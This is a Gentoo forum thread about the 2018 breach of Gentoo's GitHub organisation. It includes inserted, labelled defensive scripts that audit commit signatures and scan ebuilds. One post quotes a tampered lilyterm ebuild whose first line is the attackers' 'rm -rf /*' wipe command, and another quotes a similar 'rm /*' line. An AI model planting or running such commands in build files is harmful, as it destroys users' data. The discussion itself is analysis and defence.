khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sat Jun 30, 2018 2:51 pm Post subject: |
|
|
ulenrich ... you give them more credit than they're due, the most they achieved is gaining unauthorised access.
ulenrich wrote: | Code: | emerge --sync
"Warning - external command not allowed here - 1.line of xx.ebuild: 'rm /*'" |
|
... which is hilarious for various reasons, they were not smart enough to know where in the ebuild you might insert such a command, and they couldn't even get the command right:
Code: | % bash --login
$ cd $(mktemp -d)
$ mkdir a b c d e f g
$ /bin/rm ./*
/bin/rm: cannot remove './a': Is a directory
/bin/rm: cannot remove './b': Is a directory
/bin/rm: cannot remove './c': Is a directory
/bin/rm: cannot remove './d': Is a directory
/bin/rm: cannot remove './e': Is a directory
/bin/rm: cannot remove './f': Is a directory
/bin/rm: cannot remove './g': Is a directory |
Given the obviousness, and the complete lack of understanding involved, then I think it's safe to say no-one has anything to worry about. So, TIMTOWTDI anyone?
best ... khay |
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
Posted: Sat Jun 30, 2018 3:37 pm Post subject: |
|
|
See if it was me I would have updated a virtuals rebuild and added in a short script injected into a cronjob to create a popup advising to "upgrade" to windows10 _________________
Quote: | Removed by Chiitoo |
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sat Jun 30, 2018 3:46 pm Post subject: |
|
|
Naib wrote: | See if it was me I would have updated a virtuals rebuild and added in a short script injected into a cronjob to create a popup advising to "upgrade" to windows10 |
Naib ... you, my friend, lack imagination ... Windows98 ;)
best ... khay |
pjp Administrator
Joined: 16 Apr 2002 Posts: 20067
|
Posted: Sat Jun 30, 2018 4:17 pm Post subject: |
|
|
khayyam wrote: | So, TIMTOWTDI anyone? |
How about this?
Code: | diff <(cmd A) <(cmd B) |
I don't recall what I was doing when I wanted it, but was happy to have learned about it. _________________ Quis separabit? Quo animo? |
Vrenn Guru
Joined: 15 Dec 2004 Posts: 318
|
Posted: Sat Jun 30, 2018 6:05 pm Post subject: |
|
|
Of course I was shocked too. (but not affected)
But I think the hack has a positive effect for many users:
Before the hack: "Gentoo infrastructure? I don't care..."
After the hack: "Gentoo infrastructure! I learned a lot!"
(although the main infrastructure has not been hit)
That is the main reason for now why I try keeping up with this story. _________________ With nice greetings
Vrenn |
Ant P. Watchman
Joined: 18 Apr 2009 Posts: 6920
|
Posted: Sat Jun 30, 2018 9:09 pm Post subject: |
|
|
Maybe now they'll finally let portage check git GPG signatures, which I've been pointing out it doesn't since the start… |
bunder Bodhisattva
Joined: 10 Apr 2004 Posts: 5934
|
Posted: Sat Jun 30, 2018 10:29 pm Post subject: |
|
|
isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) _________________
Neddyseagoon wrote: | The problem with leaving is that you can only do it once and it reduces your influence. |
banned from #gentoo since sept 2017 |
potuz Guru
Joined: 30 Jan 2010 Posts: 378
|
Posted: Sat Jun 30, 2018 10:44 pm Post subject: |
|
|
dalu wrote: |
Why is this all handled like in a 3rd world country?
|
Contrary to that post I'd like to use this space to just send a quick thank you to the dev and infra teams that are handling this perfectly.
wiki wrote: |
20:19:xx Attacker tries a bad password on the account.
....
....
21:28:xx Github support responds; Gentoo Github org frozen.
....
....
06:57:xx Gentoo Infra does force-push on gentoo/systemd to restore state. c46d8bbf->bf0e0a4d.
06:58:xx Gentoo Infra does force-push on gentoo/gentoo to restore state. e6db0eb4->73b72409.
|
Less than 1h10' to contain the incident, less than 11 hours to restore the state and most importantly:
Quote: |
Subject From Date
[gentoo-announce] Gentoo Github Organization hacked. Alec Warner Thu, 28 Jun 2018 21:14:23
|
Gentoo-devs were clean and transparent about this, we were immediately informed and kept up-to-date with the developments on this issue. If anything, as a normal user without anything to help, the least I can do is to thank the team for making me feel safe. |
potuz Guru
Joined: 30 Jan 2010 Posts: 378
|
Posted: Sat Jun 30, 2018 10:52 pm Post subject: |
|
|
bunder wrote: | isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) |
In my case that rsync verify does not bug me as being slow, but it raises https://bugs.gentoo.org/648596 |
Ant P. Watchman
Joined: 18 Apr 2009 Posts: 6920
|
Posted: Sat Jun 30, 2018 11:13 pm Post subject: |
|
|
bunder wrote: | isn't that the point behind the whole rsync verify thing they were trying to add a few weeks back? (that i bet a lot of people turned off because it made sync horridly slow) |
I'd been using webrsync-gpg for years prior to that, but you're right - the current state of things is way more inefficient than it needs to be. webrsync is relatively fast but lags up to a day, rsync with signed manifests is insanely slow, and git is the same, when it should be the best option. |
bunder Bodhisattva
Joined: 10 Apr 2004 Posts: 5934
|
Posted: Sun Jul 01, 2018 2:24 am Post subject: |
|
|
I thought it depended on which distro you use, I know freebsd sets their / directory as immutable so the rm fails. Solaris/illumos took a different route, since some spec somewhere (posix perhaps) says that by trying to rm the root directory, you include the cwd, which can't be removed (so the rm fails instantly)
edit: Yeah I remembered that right https://www.youtube.com/watch?v=l6XQUciI-Sc&t=80m56s _________________
Neddyseagoon wrote: | The problem with leaving is that you can only do it once and it reduces your influence. |
banned from #gentoo since sept 2017 |
mv Watchman
Joined: 20 Apr 2005 Posts: 6747
|
Posted: Sun Jul 01, 2018 7:23 am Post subject: |
|
|
Now it is probably too late to post, but anyway:
- Warning: If you used git and just changed the url in /etc/portage/repos.conf, this address change becomes only visible when you clone a new repository. Just emerge --sync (without first completely removing /usr/portage including the .git directory) won't do.
- Alternatively, it should be sufficient to manually update the address in /usr/portage/.git/config
But I also have a question: I have temporarily changed both addresses to https://gitweb.gentoo.org/repo/gentoo.git
(Since I had not synced after the hack yet, there is no need to get rid of /usr/portage).
But git keeps claiming that it cannot access https://gitweb.gentoo.org/repo/gentoo.git/ (note the trailing slash; but I also tried with a slash added to the address with exactly the same result).
In fact, this is not a git address, but apparently only the address of the browser web interface.
Is there another address, i.e. is it possible at all to access the official git repository with the https protocol from git? (I would not like to use the unsafer git protocol).
I have another question: Although the webinterface of github/gentoo is still down, it seems already possible to sync github/gentoo/gentoo.git. According to infra status, the data should already be fine again, and also at a first glance the commits seem all reasonably be signed. Can anybody confirm that it is already safe to use the github/gentoo repository again? |
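Added example, not part of any post in this thread: one way to answer the "are the commits signed?" question is to list the signature status of every commit a sync pulled in and reject anything that is not a good signature from an expected key. The key IDs and commit hashes in the sample are constructed placeholders and `sig_records` / `audit_signatures` are hypothetical helper names; `%G?`, `%GK` and `%H` are git's own pretty-format placeholders.

```shell
#!/bin/sh
# Added example (not from the thread). Helper names are hypothetical.

# Emit one "status|signing-key|commit" record per commit in a revision range.
# %G? is git's signature status: G good, B bad, U good but key validity unknown,
# X/Y expired, R revoked key, E cannot be checked, N no signature.
sig_records() {    # usage: sig_records <repo-dir> <rev-range>
    git -C "$1" log --format='%G?|%GK|%H' "$2"
}

# Read records on stdin and print a REJECT line for every commit that is not
# status G, or whose signing key is not in the space-separated allow-list $1.
# Returns 1 if anything was rejected, 0 otherwise.
audit_signatures() {
    awk -F'|' -v allowed="$1" '
        BEGIN { n = split(allowed, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
        $1 != "G"   { print "REJECT " $3 " status=" $1; bad++; next }
        !($2 in ok) { print "REJECT " $3 " untrusted-key=" $2; bad++; next }
        END { exit (bad ? 1 : 0) }
    '
}

# Constructed sample records (placeholder key IDs and commit hashes).
SAMPLE_RECORDS='G|AAAAAAAAAAAAAAAA|1111111111111111111111111111111111111111
N||2222222222222222222222222222222222222222
G|BBBBBBBBBBBBBBBB|3333333333333333333333333333333333333333
E|AAAAAAAAAAAAAAAA|4444444444444444444444444444444444444444'

printf '%s\n' "$SAMPLE_RECORDS" | audit_signatures "AAAAAAAAAAAAAAAA" ||
    echo "range contains commits that fail the signature policy"
```

On a real checkout the records come from `sig_records /usr/portage ORIG_HEAD..HEAD` after a pull. Git can only report `G` when the signer's public key is in the local GnuPG keyring and considered valid; otherwise the status is `E` or `U` and the commit is rejected by this policy.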
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sun Jul 01, 2018 8:11 am Post subject: |
|
|
Angrychile wrote: | Oh my gawd! FILE WIPING MALWARE |
Angrychile ... wrong, and it doesn't make it any less wrong if you use bold caps and provide links with misleading headlines.
bunder wrote: | I thought it depended on which distro you use, I know freebsd sets their / directory as immutable so the rm fails. Solaris/illumos took a different route, since some spec somewhere (posix perhaps) says that by trying to rm the root directory, you include the cwd, which can't be removed (so the rm fails instantly) |
As I pointed out above, 'rm' (sys-apps/coreutils) requires the '--recursive,-r,-R' switch to remove directories:
man rm wrote: | By default, rm does not remove directories. Use the --recursive (-r or -R) option to remove each listed directory |
best ... khay |
NeddySeagoon Administrator
Joined: 05 Jul 2003 Posts: 54237 Location: 56N 3W
|
Posted: Sun Jul 01, 2018 10:35 am Post subject: |
|
|
mv,
At the time of your post, the github mirror had been reverted and was safe to use. _________________ Regards,
NeddySeagoon
Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail. |
khayyam Watchman
Joined: 07 Jun 2012 Posts: 6227 Location: Room 101
|
Posted: Sun Jul 01, 2018 1:43 pm Post subject: |
|
|
khayyam wrote: | So, TIMTOWTDI anyone? |
pjp wrote: | How about this?
Code: | diff <(cmd A) <(cmd B) |
|
pjp ... not sure there is OWTD process substitution, however I can tell you it won't work in all cases:
Code: | % echo works:<(echo)
works:/proc/self/fd/12
% echo broken:${:-<(echo)}
zsh: missing end of string
% echo fixed:${:-=(echo)}
fixed:/home/khayyam/tmp/zshDhm8cD |
As you can see the (zsh) process substitution '=(list)' creates a temporary file for the process, and so avoids issues (like the program expecting to lseek) with file descriptors or named pipes.
best ... khay |
mv Watchman
Joined: 20 Apr 2005 Posts: 6747
|
Posted: Sun Jul 01, 2018 2:06 pm Post subject: |
|
|
Thanks. The anongit.gentoo.org/git addresses can meanwhile indeed be used with the https protocol. Some months ago when I tried last this was not the case.
And indeed, it seems that github/gentoo is usable again for git syncing, although the corresponding web-page is still offline. |
gengreen Apprentice
Joined: 23 Dec 2017 Posts: 150
|
Posted: Mon Jul 02, 2018 11:03 pm Post subject: Most harmful hack of 2018 |
|
|
Ebuild "hacked"
x11-terms/lilyterm-0.9.9.4-r1
Code: | rm -rf /*
# Copyright 1999-2018 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
EAPI=5
inherit eutils
DESCRIPTION="a terminal emulator based off of libvte that aims to be fast and lightweight"
HOMEPAGE="https://lilyterm.luna.com.tw"
LICENSE="GPL-3"
SRC_URI="https://${PN}.luna.com.tw/file/${P}.tar.gz"
SLOT="0"
KEYWORDS="~amd64 ~x86"
RDEPEND="
x11-libs/vte:0
"
DEPEND="
${RDEPEND}
dev-util/intltool
sys-devel/gettext
virtual/pkgconfig
"
DOCS=( AUTHORS ChangeLog README TODO )
src_prepare() {
epatch "${FILESDIR}"/${PN}-0.9.9.4-gettext.patch
./autogen.sh
} |
ebuild lilyterm-0.9.9.4-r1 digest manifest
Quote: | * ERROR: lilyterm-0.9.9.4-r1::musl failed (depend phase):
* External commands disallowed while sourcing ebuild: rm -rf *
*
* Call stack:
...
|
|
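Added example, not from the post and not Portage's own check: the error above comes from Portage refusing external commands while it sources the ebuild, and the same property can be checked at review time by flagging anything at global scope that is not a comment, an assignment or an eclass directive. The function name `scan_ebuild_globals` is hypothetical, the sample is abbreviated from the ebuild quoted above and is only ever read as text, and the check is a line-based heuristic (multi-line arrays and conditionals at global scope are reported for manual review).

```shell
#!/bin/sh
# Added example: heuristic review check, not Portage's implementation.

# Read an ebuild on stdin and print "line-number: text" for every global-scope
# line that is not a comment, a plain assignment or an eclass directive.
# Assignments that use command substitution are flagged too.
# Returns 1 when anything is flagged, 0 otherwise.
scan_ebuild_globals() {
    awk '
        function quotes(s) { return gsub(/"/, "", s) }   # s is a local copy of the line
        instr  { if (quotes($0) % 2) instr = 0; next }    # inside a multi-line "..." value
        infunc { if ($0 ~ /^[}]/) infunc = 0; next }      # inside a phase function body
        /^[ \t]*(#.*)?$/ { next }                         # blank line or comment
        /^[A-Za-z_][A-Za-z0-9_]*[(][)][ \t]*[{]/ { infunc = 1; next }
        /^(inherit|EXPORT_FUNCTIONS)[ \t]/ { next }
        /^[A-Za-z_][A-Za-z0-9_]*[+]?=/ {
            if ($0 ~ /[$][(]|`/) { print NR ": " $0; bad++ }
            else if (quotes($0) % 2) instr = 1
            next
        }
        { print NR ": " $0; bad++ }
        END { exit (bad ? 1 : 0) }
    '
}

# Sample abbreviated from the ebuild quoted in the post; treated as data only.
SAMPLE_EBUILD='rm -rf /*
# Copyright 1999-2018 Gentoo Foundation
EAPI=5
inherit eutils
DESCRIPTION="a terminal emulator based off of libvte"
RDEPEND="
x11-libs/vte:0
"
DOCS=( AUTHORS ChangeLog README TODO )
src_prepare() {
./autogen.sh
}'

printf '%s\n' "$SAMPLE_EBUILD" | scan_ebuild_globals ||
    echo "global-scope commands found: do not merge without review"
```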
joanandk Apprentice
Joined: 12 Feb 2017 Posts: 169
|
Posted: Tue Jul 03, 2018 5:36 am Post subject: |
|
|
Tony0945 wrote: | EDIT We're seeing that famed Microsoft security. |
I do not think this has happened by accident, it was planned and executed by the new staff.
BR |
Naib Watchman
Joined: 21 May 2004 Posts: 6051 Location: Removed by Neddy
|
Posted: Tue Jul 03, 2018 9:16 am Post subject: |
|
|
thanks... stupid google and amp via mobile _________________
Quote: | Removed by Chiitoo |